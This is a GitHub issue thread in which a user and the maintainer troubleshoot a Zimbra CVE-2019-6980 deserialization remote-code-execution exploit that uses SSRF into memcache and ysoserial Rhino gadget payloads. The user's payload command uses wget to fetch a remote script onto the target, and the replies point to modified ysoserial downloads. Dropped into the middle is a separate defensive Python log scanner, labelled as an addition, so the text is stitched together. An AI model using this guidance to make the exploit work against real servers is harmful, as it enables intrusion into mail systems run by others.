
Deserialization error in the Zimbra_Deserialization_RCE_CVE-2019-6980.py

Open chenxiaode168 opened this issue 2 years ago • 3 comments

Good morning,

I have tested CVE-2019-6980 on Zimbra version 8.7.10 & 8.7.11 (Free edition) with the latest ysoserial package version 0.0.6. For both cases, there are some errors observed in the mailbox.log shown below:

com.zimbra.common.service.ServiceException: system failure: Failed to deserialize ImapFolder xxxxxxx xxxxxxxxxxxx Caused by: java.io.InvalidClassException: org.mozilla.javascript.ScriptableObject: local class incompatible: stream classdesc serialVersionUID=xxxxxxxxxxxxxxx, local class serialVersionUID=-xxxxxxxxxxxxxxxxx xxxxxxxx xxxxxxxx

From my observation, the zImap entry was successfully inserted into the memcache (verified) through SSRF, and deserialization occurred when the IMAP account logged on (with select inbox, correct folderNo, modseq & uidvalidity).

MozillaRhino2 payload was used in ysoserial to generate the payload (java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget http://1.2.3.4/test.sh --no-check-certificate -O /tmp/test.sh"). I also tested with MozillaRhino1 but it failed too.

Can you advise what I did wrong here? What is the exact Zimbra version and ysoserial that you have tested with? Thank you very much

chenxiaode168 avatar Sep 08 '22 10:09 chenxiaode168
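An added example, written from the defender's side and not part of this issue or of the Homework-of-Python project: a small Python check that scans mailbox.log entries shaped like the error quoted above, flags failed ImapFolder deserializations, and extracts the class name plus the stream and local serialVersionUID values, so a foreign serialized object arriving through the IMAP folder cache is visible in monitoring even when it never executed. The log lines and UID numbers in the sample are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# The service-level message quoted in the issue.
DESER_FAIL = re.compile(r"Failed to deserialize ImapFolder")
# The JDK InvalidClassException cause; tolerant of "; " vs ": " after the
# class name and of optional spaces around "=" in the UID fields.
INVALID_CLASS = re.compile(
    r"java\.io\.InvalidClassException: (?P<cls>[\w.$]+)[;:]\s*"
    r"local class incompatible:\s*stream classdesc serialVersionUID\s*=\s*(?P<stream>-?\d+),"
    r"\s*local class serialVersionUID\s*=\s*(?P<local>-?\d+)"
)


@dataclass
class DeserFailure:
    cls: str          # class the stream tried to instantiate
    stream_uid: int   # serialVersionUID carried in the serialized bytes
    local_uid: int    # serialVersionUID of the class on the server


def parse_failure(entry: str) -> Optional[DeserFailure]:
    """Return mismatch details if `entry` (one log entry, possibly several
    lines) is a failed ImapFolder deserialization caused by an
    InvalidClassException, otherwise None."""
    if not DESER_FAIL.search(entry):
        return None
    m = INVALID_CLASS.search(entry)
    if not m:
        return None
    return DeserFailure(m["cls"], int(m["stream"]), int(m["local"]))


def scan_log(text: str) -> List[DeserFailure]:
    """Split a mailbox.log dump into entries (each starts with a date) so a
    'Caused by:' continuation stays with its entry, then collect failures."""
    entries = re.split(r"\n(?=\d{4}-\d{2}-\d{2} )", text)
    return [f for f in map(parse_failure, entries) if f is not None]


# Constructed sample: one benign entry and one shaped like the quoted error.
SAMPLE_LOG = """2022-09-08 10:09:01,000 INFO  [ImapServer] imap - user logged in
2022-09-08 10:09:02,000 WARN  [ImapServer] imap - com.zimbra.common.service.ServiceException: system failure: Failed to deserialize ImapFolder
Caused by: java.io.InvalidClassException: org.mozilla.javascript.ScriptableObject; local class incompatible: stream classdesc serialVersionUID = 2762574228534609611, local class serialVersionUID = -6163443711432013615
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"ALERT: {f.cls} stream={f.stream_uid} local={f.local_uid}")
```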

Zimbra 8.8.10 ysoserial 0.0.6

It seems that it is a problem with the deserialization payload. You can also try this ysoserial from https://blog.csdn.net/fnmsd/article/details/89235589?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&dist_request_id=1328603.11954.16149289993579653&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control

Download link of ysoserial: Link: https://pan.baidu.com/s/1UZ7sxI1l0f3EB0MydDu2GQ Extraction code: 0sgb

3gstudent avatar Sep 15 '22 01:09 3gstudent

Hi, thanks for your advice. I tried testing on Zimbra version 8.8.6 and got the same error. From these results, it may not be a Zimbra version issue? I use the official ysoserial 0.0.6 release. I think it is the same as your ysoserial version. What else can I try to make it work? Thank you

chenxiaode168 avatar Sep 27 '22 05:09 chenxiaode168

Try this: https://github.com/3gstudent/test/releases/download/ysoserial-0.0.6-SNAPSHOT/ysoserial-0.0.6-SNAPSHOT.zip

3gstudent avatar Oct 08 '22 01:10 3gstudent